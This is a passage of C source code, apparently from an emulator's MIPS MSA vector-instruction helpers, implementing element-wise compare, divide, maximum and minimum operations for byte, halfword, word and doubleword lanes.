0; } void helper_msa_clt_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_clt_s_d(pws->d[0], pwt->d[0]); pwd->d[1] = msa_clt_s_d(pws->d[1], pwt->d[1]); } static inline int64_t msa_clt_u_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return u_arg1 < u_arg2 ? -1 : 0; } void helper_msa_clt_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_clt_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_clt_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_clt_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_clt_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_clt_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_clt_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_clt_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_clt_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_clt_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_clt_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_clt_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_clt_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_clt_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_clt_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_clt_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_clt_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_clt_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_clt_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_clt_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_clt_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_clt_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_clt_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_clt_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_clt_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_clt_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_clt_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_clt_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_clt_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_clt_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_clt_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_clt_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_clt_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_clt_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* * Int Divide * ---------- * * +---------------+----------------------------------------------------------+ * | DIV_S.B | Vector Signed Divide (byte) | * | DIV_S.H | Vector Signed Divide (halfword) | * | DIV_S.W | Vector Signed Divide (word) | * | DIV_S.D | Vector Signed Divide (doubleword) | * | DIV_U.B | Vector Unsigned Divide (byte) | * | DIV_U.H | Vector Unsigned Divide (halfword) | * | DIV_U.W | Vector Unsigned Divide (word) | * | DIV_U.D | Vector Unsigned Divide (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_div_s_df(uint32_t df, int64_t arg1, int64_t arg2) { if (arg1 == DF_MIN_INT(df) && arg2 == -1) { return DF_MIN_INT(df); } return arg2 ? arg1 / arg2 : arg1 >= 0 ? -1 : 1; } void helper_msa_div_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_div_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_div_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_div_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_div_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_div_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_div_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_div_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_div_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_div_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_div_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_div_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_div_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_div_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_div_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_div_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_div_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_div_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_div_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_div_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_div_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_div_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_div_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_div_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_div_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_div_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_div_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_div_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_div_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_div_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_div_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_div_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_div_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_div_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_div_u_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return arg2 ? u_arg1 / u_arg2 : -1; } void helper_msa_div_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_div_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_div_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_div_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_div_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_div_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_div_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_div_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_div_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_div_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_div_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_div_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_div_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_div_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_div_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_div_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_div_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_div_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_div_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_div_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_div_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_div_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_div_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_div_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_div_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_div_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_div_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_div_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_div_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_div_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_div_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_div_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_div_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_div_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* * Int Dot Product * --------------- * * +---------------+----------------------------------------------------------+ * | DOTP_S.H | Vector Signed Dot Product (halfword) | * | DOTP_S.W | Vector Signed Dot Product (word) | * | DOTP_S.D | Vector Signed Dot Product (doubleword) | * | DOTP_U.H | Vector Unsigned Dot Product (halfword) | * | DOTP_U.W | Vector Unsigned Dot Product (word) | * | DOTP_U.D | Vector Unsigned Dot Product (doubleword) | * | DPADD_S.H | Vector Signed Dot Product (halfword) | * | DPADD_S.W | Vector Signed Dot Product (word) | * | DPADD_S.D | Vector Signed Dot Product (doubleword) | * | DPADD_U.H | Vector Unsigned Dot Product (halfword) | * | DPADD_U.W | Vector Unsigned Dot Product (word) | * | DPADD_U.D | Vector Unsigned Dot Product (doubleword) | * | DPSUB_S.H | Vector Signed Dot Product (halfword) | * | DPSUB_S.W | Vector Signed Dot Product (word) | * | DPSUB_S.D | Vector Signed Dot Product (doubleword) | * | DPSUB_U.H | Vector Unsigned Dot Product (halfword) | * | DPSUB_U.W | Vector Unsigned Dot Product (word) | * | DPSUB_U.D | Vector Unsigned Dot Product (doubleword) | * +---------------+----------------------------------------------------------+ */ /* TODO: insert Int Dot Product group helpers here */ /* * Int Max Min * ----------- * * +---------------+----------------------------------------------------------+ * | MAX_A.B | Vector Maximum Based on Absolute Value (byte) | * | MAX_A.H | Vector Maximum Based on Absolute Value (halfword) | * | MAX_A.W | Vector Maximum Based on Absolute Value (word) | * | MAX_A.D | Vector Maximum Based on Absolute Value (doubleword) | * | MAX_S.B | Vector Signed Maximum (byte) | * | MAX_S.H | Vector Signed Maximum (halfword) | * | MAX_S.W | Vector Signed Maximum (word) | * | MAX_S.D | Vector Signed Maximum (doubleword) | * | MAX_U.B | Vector Unsigned Maximum (byte) | * | MAX_U.H | Vector Unsigned Maximum (halfword) | * | MAX_U.W | Vector Unsigned Maximum (word) | * | MAX_U.D | Vector Unsigned Maximum (doubleword) | * | MIN_A.B | Vector Minimum Based on Absolute Value (byte) | * | MIN_A.H | Vector Minimum Based on Absolute Value (halfword) | * | MIN_A.W | Vector Minimum Based on Absolute Value (word) | * | MIN_A.D | Vector Minimum Based on Absolute Value (doubleword) | * | MIN_S.B | Vector Signed Minimum (byte) | * | MIN_S.H | Vector Signed Minimum (halfword) | * | MIN_S.W | Vector Signed Minimum (word) | * | MIN_S.D | Vector Signed Minimum (doubleword) | * | MIN_U.B | Vector Unsigned Minimum (byte) | * | MIN_U.H | Vector Unsigned Minimum (halfword) | * | MIN_U.W | Vector Unsigned Minimum (word) | * | MIN_U.D | Vector Unsigned Minimum (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_max_a_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t abs_arg1 = arg1 >= 0 ? arg1 : -arg1; uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2; return abs_arg1 > abs_arg2 ? arg1 : arg2; } void helper_msa_max_a_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_max_a_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_max_a_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_max_a_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_max_a_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_max_a_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_max_a_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_max_a_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_max_a_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_max_a_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_max_a_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_max_a_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_max_a_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_max_a_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_max_a_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_max_a_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_max_a_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_max_a_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_max_a_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_max_a_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_max_a_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_max_a_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_max_a_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_max_a_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_max_a_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_max_a_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_max_a_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_max_a_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_max_a_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_max_a_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_max_a_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_max_a_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_max_a_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_max_a_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_max_s_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 > arg2 ? arg1 : arg2; } void helper_msa_max_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_max_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_max_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_max_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_max_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_max_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_max_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_max_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_max_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_max_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_max_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_max_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_max_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_max_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_max_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_max_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_max_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_max_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_max_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_max_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_max_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_max_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_max_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_max_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_max_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_max_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_max_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_max_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_max_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_max_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_max_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_max_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_max_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_max_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_max_u_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return u_arg1 > u_arg2 ? arg1 : arg2; } void helper_msa_max_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_max_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_max_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_max_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_max_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_max_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_max_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_max_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_max_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_max_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_max_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_max_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_max_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_max_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_max_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_max_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_max_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_max_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_max_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_max_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_max_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_max_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_max_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_max_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_max_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_max_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_max_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_max_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_max_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_max_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_max_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_max_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_max_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_max_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_min_a_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t abs_arg1 = arg1 >= 0 ? arg1 : -arg1; uint64_t abs_arg2 = arg2 >= 0 ? arg2 : -arg2; return abs_arg1 < abs_arg2 ? arg1 : arg2; } void helper_msa_min_a_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_min_a_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_min_a_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_min_a_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_min_a_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_min_a_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_min_a_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_min_a_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_min_a_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_min_a_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_min_a_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_min_a_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_min_a_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_min_a_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_min_a_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_min_a_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_min_a_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_min_a_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_min_a_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_min_a_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_min_a_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_min_a_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_min_a_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_min_a_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_min_a_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_min_a_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_min_a_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_min_a_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_min_a_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_min_a_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_min_a_df(DF_WORD, pws->w[3], pwt->w[3]); } void 